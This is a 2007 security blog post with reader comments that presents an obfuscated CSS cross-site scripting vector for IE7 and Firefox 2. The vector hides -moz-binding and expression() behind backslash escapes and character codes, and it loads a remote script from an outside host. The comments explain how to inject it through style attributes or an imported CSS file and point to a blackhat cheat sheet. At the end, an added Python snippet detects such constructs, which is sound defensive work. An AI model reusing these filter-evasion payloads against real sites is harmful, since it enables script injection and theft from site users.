Ultimate XSS CSS injection
Monday, 26 November 2007
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.
Credits update
The expression part of this technique was first demonstrated by Dan on the slackers forums. Nice one Dan, and sorry about missing you from the credits.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
Please use my tool Hackvertor if you need to decode the IE vector, as it will provide you with all the necessary conversions. Please note the vector has been broken up onto multiple lines for viewing purposes; remove the line breaks when testing the vector.
No. 1 — November 26th, 2007 at 3:59 pm
here are the sources
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;
scr=document.createElement(x(115,99,114,105,112,116));
scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,115,115,47,120,115,115,46,106,115));
document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);
window.r=1;')
n1
No. 2 — November 26th, 2007 at 4:21 pm
Hackvertor can now reconstruct this attack using the tag XSS->mozbindingexpression
and even add the backslashes for you
Filter evasion->backslashesc
No. 3 — November 26th, 2007 at 9:32 pm
Very interesting,
another great Job Gareth !!
No. 4 — November 28th, 2007 at 7:09 am
wow!
very nice work 🙂
No. 5 — December 2nd, 2007 at 10:45 am
how do you use this code for xss ?
Eliena
No. 6 — December 2nd, 2007 at 10:48 am
You need to remove the line breaks and the code requires an id="inject" to work on IE7. It can be injected within most HTML tags using the style attribute.
No. 7 — December 3rd, 2007 at 12:22 am
So, its main advantage is on sites that filter “script” tags. You still need to pass “<” and “>” right?
No. 8 — December 3rd, 2007 at 6:42 am
Nope you don’t need “<” or “>” to use this injection, you just need a style attribute to inject.
No. 9 — December 10th, 2007 at 10:53 pm
Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers- I was just trying to find out If I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!
An damn, is that fine or what?! Nice work with that injection. A beautiful thing…
-Dan
No. 10 — December 11th, 2007 at 6:48 am
Hey Dan no probs you contributed to the above vector so you deserve credit 🙂
No. 11 — January 11th, 2008 at 4:35 pm
<script>alert(“test”)</script>
No. 12 — January 11th, 2008 at 5:38 pm
@l0ad1ng_x
LOL!
No. 13 — January 16th, 2008 at 8:29 pm
Can you please show us the source of this xss before it was “hackvectoreted”. I guess that’s here there but I just don’t find any way to reverse it.
Thanks
PS. Nice work you guys
No. 14 — January 16th, 2008 at 8:30 pm
Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/
No. 15 — January 16th, 2008 at 8:32 pm
Sorry for the mess but don’t know to edit my post | guess that’s HEX there but I just don’t find any way to reverse it. |*
No. 16 — January 17th, 2008 at 12:13 am
@no.connexion
Hackvertor can also decode data you know 😉
I’ve decoded it for you and can provide the code so you can enter your own:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D
Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression
No. 17 — January 18th, 2008 at 2:33 am
Thanks for the answer. Is it possible to use this XSS through a css file? What I’ve tried to do is to insert <link href=”hxxp://wwwexample.com/css/xss.css”> and then <div class=”somename” style=”” id=”inject”>test</div> in html and the xss.css should look like <<< .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);x&#…1;') : 1);
} >>>
or maybe something like that: body {
background-image: url(‘javascript:alert(“XSS”);’)
}
None of the above worked … maybe I’m doing something the wrong way or it’s just not going to work.
No. 18 — January 18th, 2008 at 9:17 am
@no.connexion
Yeah it’s possible to use it through a CSS file. In the file you need to define the rule as :-
body {
//code here
}
Then simply insert as a normal CSS through link or @import
No. 19 — January 18th, 2008 at 2:50 pm
Thanks for response.
Here are my final thoughts.
Added in html the following:
…
<style type=”text/css”>
@import url(http://www.example.com/css/test.css);
</style>
</head>
<body>
<b> This IS a test </b>
</body>
…
and the in test.css:
…
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’)<@/hex_ent> : 1);
}
…
OR
in test.css
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
AND it works fine for Firefox but IE7 does nothing. I’m using 7.0.5730.13.
No. 20 — January 18th, 2008 at 3:30 pm
@no.connexion
Dude you need to run “convert” in Hackvertor first before adding it to the page.
No. 21 — January 18th, 2008 at 3:55 pm
I guess I was using the converted version in my css here:
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.
No. 22 — January 18th, 2008 at 3:57 pm
Yep tested on IE and Firefox
No. 23 — January 20th, 2008 at 3:02 am
Please take a look in here:
hxxp://noconnexion.wordpress.com/
No. 24 — September 2nd, 2008 at 4:59 am
coo000lllL :::::::: good work
No. 25 — October 9th, 2008 at 7:16 pm
Firefox 3 fixed this xml hole?
No. 26 — October 9th, 2008 at 8:03 pm
Yeah it’s fixed in FF3 final, I think the beta it was still in but they removed it 🙁
I thought it was possible to do it inline but Giorgio mentioned it’s only available in chrome 🙁
No. 27 — January 13th, 2010 at 4:43 am
How can you stop people from writing these types of attacks to a css file when allowing people to write their own css files on your server?
No. 28 — January 13th, 2010 at 1:23 pm
@sim
Validate the CSS using a CSS parser like AntiSamy
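As a defender-side companion to the question in comment 27 and to the post's own trick of hiding -moz-binding and expression() behind CSS backslash escapes and HTML entities, here is an added Python example (not from the post, Hackvertor or AntiSamy) that undoes those decodings the way a browser would and then flags the dangerous constructs. The sample strings are the obfuscated property fragments quoted in the post plus constructed inputs; the property names and regexes are my own choice.

```python
import html
import re

# Constructs this page discusses, matched after normalisation: the Firefox 2
# XBL binding, IE7's expression(), IE's behavior: property and javascript: URLs.
DANGEROUS = [
    ("moz-binding", re.compile(r"-moz-binding\s*:")),
    ("expression", re.compile(r"expression\s*\(")),
    ("behavior", re.compile(r"behaviou?r\s*:")),
    ("javascript-url", re.compile(r"url\s*\(\s*['\"]?\s*javascript:")),
    ("import", re.compile(r"@import\b")),
]

# CSS escape: backslash + 1-6 hex digits (+ one optional whitespace), or
# backslash + any other single character, which stands for itself.
CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(.))", re.S)


def decode_css_escapes(text):
    """Undo CSS backslash escapes as a browser tokenizer does,
    so that '\\-\\mo\\z\\-b\\i\\nd\\in\\g' becomes '-moz-binding'."""
    def repl(m):
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
        return m.group(2)
    return CSS_ESCAPE.sub(repl, text)


def normalise_css(text):
    """Apply the decodings an attacker relies on the browser performing:
    HTML entities (IE accepts them in style attributes), CSS escapes,
    comment stripping, then lower-case and whitespace collapsing."""
    text = html.unescape(text)
    text = decode_css_escapes(text)
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()


def find_dangerous_css(text):
    """Return the names of dangerous constructs found in the normalised CSS."""
    norm = normalise_css(text)
    return [name for name, rx in DANGEROUS if rx.search(norm)]


# Constructed samples: the first two are the obfuscated fragments from the post
# (with a harmless expression body), the third uses an HTML entity for 'e'.
ESCAPED_BINDING = r"\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)"
ESCAPED_EXPRESSION = r"xx: e\xp\re\s\s\i\o\n((window.r!=1) ? 1 : 1)"
ENTITY_EXPRESSION = "x: &#101;xpression(1)"
BENIGN = "color: red; background: url(/img/bg.png)"
```

This is a detection aid only; a sanitizer should still parse the CSS and keep only an allow-list of known-safe properties, as the AntiSamy answer above suggests.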